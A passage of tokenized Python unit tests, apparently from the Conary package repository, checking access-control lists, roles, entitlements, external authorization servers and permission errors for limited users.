<NUM_LIT:0> ) ] <EOL> repos . deleteAcl ( rootLabel , '<STR_LIT>' , None , None ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = branchLabel . asString ( ) , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , <EOL> canRemove = <NUM_LIT:0> ) ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> repos . deleteAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel . asString ( ) ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = branchLabel . asString ( ) , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , <EOL> canRemove = <NUM_LIT:0> ) ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> repos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , <EOL> '<STR_LIT>' , '<STR_LIT>' , False , False ) <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> repos . deleteAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> def testGetRoles ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos = self . getRepositoryClient ( ) <EOL> l = versions . Label ( "<STR_LIT>" ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> repos . addRole ( l , '<STR_LIT>' ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ '<STR_LIT:test>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> repos . addRoleMember ( l , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . assertEqual ( repos . getRoles ( l ) , [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( repos . getRoleMembers ( l , '<STR_LIT>' ) , [ '<STR_LIT:test>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ ] ) <EOL> self . assertEqual ( repos . getRoleMembers ( l , '<STR_LIT>' ) , [ ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ '<STR_LIT:test>' ] ) <EOL> repos . deleteRole ( l , '<STR_LIT>' ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> def testBadUser ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos = self . getRepositoryClient ( user = '<STR_LIT:foo>' , password = '<STR_LIT:bar>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> results = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> assert ( '<STR_LIT>' in results ) <EOL> def testBadTrovepattern ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = '<STR_LIT:foo>' <EOL> l = versions . Label ( "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , l , user , '<STR_LIT:bar>' ) <EOL> self . assertRaises ( errors . InvalidRegex , <EOL> repos . addAcl , l , user , '<STR_LIT:*>' , '<STR_LIT>' , False , False ) <EOL> repos . addAcl ( l , user , '<STR_LIT>' , '<STR_LIT>' , False , False ) <EOL> self . assertRaises ( errors . InvalidRegex , <EOL> repos . editAcl , l , user , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:*>' , '<STR_LIT>' , <EOL> False , False ) <EOL> def testBadUserTriesToCommit ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT:bar>' <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , False , False ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , True , False ) <EOL> limitedRepos = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT>" , repos = limitedRepos ) <EOL> def testFallbackThenNeedUser ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , write = True ) <EOL> trv = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> limitedRepos = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> assert ( limitedRepos . getTrove ( * trv . getNameVersionFlavor ( ) ) ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT:1.0>" , repos = limitedRepos ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT:1.0>" , repos = limitedRepos ) <EOL> def testNonExistingUserTriesToCommit ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT:bar>' <EOL> repos = self . openRepository ( ) <EOL> limited = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT>" , repos = limited ) <EOL> def testUserPasswordQuoting ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = '<STR_LIT:foo>' <EOL> password = '<STR_LIT>' <EOL> bl = self . cfg . buildLabel <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , False , False ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , True , False ) <EOL> limitedRepos = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT>" , repos = limitedRepos ) <EOL> l = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> assert ( l . keys ( ) == [ '<STR_LIT>' ] ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testExternalAuthChecks ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> pwServer = AuthorizationServer ( PasswordHttpRequests ) <EOL> entServer = AuthorizationServer ( EntitlementRequests ) <EOL> try : <EOL> repos = self . openRepository ( authCheck = pwServer . url ( ) + '<STR_LIT>' , <EOL> entCheck = entServer . url ( ) + '<STR_LIT>' ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT>' , None , None ) <EOL> origEntClient = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> rootLabel , None , None , <EOL> withClass = True ) [ <NUM_LIT:0> ] <EOL> pwClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> pwClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> self . assertRaises ( errors . CannotChangePassword , <EOL> pwClient . changePassword , <EOL> rootLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> pwClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> pwClient . c . __getitem__ , '<STR_LIT:localhost>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> origEntClient . c . __getitem__ , '<STR_LIT:localhost>' ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> withClass = True ) . getRepos ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> withClass = False ) . getRepos ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> pwServer . kill ( ) <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testThreadedEntitlementUpdates ( self ) : <EOL> rootLabel = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( rootLabel , '<STR_LIT>' ) <EOL> self . cfg . threaded = True <EOL> origEntClient = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> rootLabel , None , None , <EOL> onDisk = False ) [ <NUM_LIT:1> ] <EOL> self . cfg . threaded = False <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' , filePrimer = <NUM_LIT:1> ) <EOL> self . addCollection ( '<STR_LIT:bar>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> self . checkUpdate ( [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> client = origEntClient , apply = True ) <EOL> def testPermissionRevoked ( self ) : <EOL> self . openRepository ( <NUM_LIT:1> ) <EOL> tFoo = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tBar = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tBar1 = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( versions . Label ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> limitedRepos = self . setupUser ( repos , <EOL> versions . Label ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:bar>' , None , <EOL> versions . Label ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limitedRepos . getTrove , <EOL> '<STR_LIT>' , tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) <EOL> limitedRepos . createChangeSet ( [ <EOL> ( '<STR_LIT>' , ( tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) , <EOL> ( tBar . getVersion ( ) , tBar . getFlavor ( ) ) , False ) ] ) <EOL> limitedRepos . createChangeSet ( [ <EOL> ( '<STR_LIT>' , ( tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) , <EOL> ( tBar1 . getVersion ( ) , tBar1 . getFlavor ( ) ) , False ) ] ) <EOL> def testComplexRegexp ( self ) : <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addCollection ( '<STR_LIT:bar>' , '<STR_LIT:1>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> limitedRepos = self . setupUser ( repos , self . cfg . buildLabel , <EOL> '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , <EOL> self . cfg . buildLabel ) <EOL> assert ( sorted ( limitedRepos . troveNames ( self . cfg . buildLabel ) ) == <EOL> [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> def testRecursiveGetChangeSetAcl ( self ) : <EOL> def _missing ( cs , name , trv ) : <EOL> trvCs = cs . getNewTroveVersion ( name , trv . getVersion ( ) , <EOL> trv . getFlavor ( ) ) <EOL> trv = trove . Trove ( trvCs ) <EOL> return trv . isMissing ( ) <EOL> repos = self . openRepository ( ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> debug = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> trv = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , False ) ] ) <EOL> label = versions . Label ( "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . deleteUserByName ( label , '<STR_LIT>' ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ta = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ trv . getNameVersionFlavor ( ) ] ) <EOL> limited = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> for rep in ( limited , ta ) : <EOL> cs = rep . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> if rep != ta : <EOL> assert ( _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> cs = rep . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> if rep != ta : <EOL> assert ( _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> cs = repos . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testMultipleEntitlements ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> lib = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> runtimeEnt = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> self . cfg . buildLabel , '<STR_LIT>' , <EOL> None , withClass = True , <EOL> onDisk = False ) [ <NUM_LIT:0> ] <EOL> libEnt = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> self . cfg . buildLabel , '<STR_LIT>' , <EOL> None , withClass = True , <EOL> onDisk = False ) [ <NUM_LIT:0> ] <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , runtimeEnt . getTrove , <EOL> * lib . getNameVersionFlavor ( ) ) <EOL> self . assertRaises ( errors . InsufficientPermission , libEnt . getTrove , <EOL> * runtime . getNameVersionFlavor ( ) ) <EOL> mixed = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:*>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , onDisk = False ) . getRepos ( ) <EOL> mixed . getTroves ( [ runtime . getNameVersionFlavor ( ) , <EOL> lib . getNameVersionFlavor ( ) ] ) <EOL> duplicate = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , onDisk = False ) . getRepos ( ) <EOL> duplicate . getTroves ( [ runtime . getNameVersionFlavor ( ) , <EOL> lib . getNameVersionFlavor ( ) ] ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testAnonymousAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> lib = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> repos . deleteRole ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> anonUser = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> runtimeUser = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , False ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , False ) <EOL> assert ( runtimeUser . hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , True ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> assert ( not runtimeUser . hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , False ) <EOL> repos . addRole ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , True ) <EOL> repos . updateRoleMembers ( self . cfg . buildLabel , '<STR_LIT>' , [ '<STR_LIT:user>' ] ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> assert ( not runtimeUser . hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> def testNonAnonymousAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT>' , <EOL> None , None ) <EOL> badUser = self . getRepositoryClient ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> badUser . changePassword , '<STR_LIT:localhost>' , '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testDynamicEntitlementDir ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . setupEntitlement ( repos , "<STR_LIT>" , "<STR_LIT>" , self . cfg . buildLabel , <EOL> None , None , withClass = True ) [ <NUM_LIT:0> ] <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> cfg = copy . copy ( self . cfg ) <EOL> cfg . resetToDefault ( '<STR_LIT:user>' ) <EOL> cfg . entitlementDirectory = self . workDir <EOL> anonClient = netclient . NetworkRepositoryClient ( cfg ) <EOL> open ( self . workDir + "<STR_LIT>" , "<STR_LIT:w>" ) . write ( <EOL> conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert ( anonClient . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> def _entitlementTimeouts ( self , RequestClass , authCacheTimeout = <NUM_LIT:0> ) : <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , <EOL> withClass = False , onDisk = True ) . getRepos ( ) <EOL> entServer = AuthorizationServer ( RequestClass ) <EOL> try : <EOL> repos = self . openRepository ( <EOL> entCheck = entServer . url ( ) + '<STR_LIT>' , <EOL> authTimeout = authCacheTimeout , <EOL> singleWorker = True , <EOL> ) <EOL> self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , self . cfg . buildLabel , <EOL> None , None , onDisk = False ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] <EOL> self . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ) <EOL> entServer . kill ( ) <EOL> entServer . start ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> f = open ( self . workDir + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> f . write ( conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , <EOL> className = '<STR_LIT>' , <EOL> key = '<STR_LIT>' ) ) <EOL> f . close ( ) <EOL> self . sleep ( <NUM_LIT:1> ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testEntitlementTimeouts ( self ) : <EOL> self . _entitlementTimeouts ( OneTimeEntitlementRequests , <EOL> authCacheTimeout = <NUM_LIT:1> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testPerEntitlementTimeouts ( self ) : <EOL> self . _entitlementTimeouts ( OneTimeEntitlementRequestsInternalTimeout , <EOL> authCacheTimeout = <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testEntitlementAutoRetry ( self ) : <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , <EOL> withClass = False , onDisk = True ) . getRepos ( ) <EOL> entServer = AuthorizationServer ( RetryEntitlementRequests ) <EOL> try : <EOL> repos = self . openRepository ( entCheck = entServer . url ( ) + '<STR_LIT>' , <EOL> authTimeout = <NUM_LIT:1> ) <EOL> self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , self . cfg . buildLabel , <EOL> None , None , onDisk = False ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] <EOL> self . sleep ( <NUM_LIT:1> ) <EOL> entClient . c . entitlements . append ( ( '<STR_LIT:localhost>' , ( None , None ) ) ) <EOL> self . mock ( conarycfg , '<STR_LIT>' , <EOL> lambda * args , ** kwargs : <NUM_LIT:1> / <NUM_LIT:0> ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> def testOldAclCalls ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . c [ '<STR_LIT:localhost>' ] . setProtocolVersion ( <NUM_LIT> ) <EOL> self . assertRaises ( errors . InvalidServerVersion , <EOL> repos . addAcl , self . cfg . buildLabel , '<STR_LIT:test>' , [ ] , [ ] ) <EOL> try : <EOL> repos . c [ '<STR_LIT:localhost>' ] . addAcl ( <NUM_LIT> ) <EOL> except errors . InvalidClientVersion , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> self . assertRaises ( errors . InvalidServerVersion , <EOL> repos . editAcl , self . cfg . buildLabel , '<STR_LIT:test>' , [ ] , [ ] , <EOL> False , False ) <EOL> try : <EOL> repos . c [ '<STR_LIT:localhost>' ] . editAcl ( <NUM_LIT> ) <EOL> except errors . InvalidClientVersion , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> def testTroveAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> comp = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> pkg = self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1.0>' , [ '<STR_LIT>' ] ) <EOL> grp = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1.0>' , [ '<STR_LIT:foo>' ] ) <EOL> comp1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> comp1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pkg1 = self . addCollection ( "<STR_LIT:bar>" , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> grp1 = self . addCollection ( "<STR_LIT>" , "<STR_LIT>" , [ ( "<STR_LIT:bar>" , "<STR_LIT>" ) ] ) <EOL> grp2 = self . addCollection ( "<STR_LIT>" , "<STR_LIT>" , [ ( "<STR_LIT:foo>" , "<STR_LIT:1.0>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , True ) <EOL> mirrorClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * comp1 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * comp1 . getNameVersionFlavor ( ) ) ) <EOL> self . assertEqual ( userClient . troveNames ( self . cfg . buildLabel ) , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . values ( ) , <EOL> [ False , False ] ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . values ( ) , <EOL> [ True , True ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg1 . getNameVersionFlavor ( ) , grp1 . getNameVersionFlavor ( ) , grp2 . getNameVersionFlavor ( ) , <EOL> 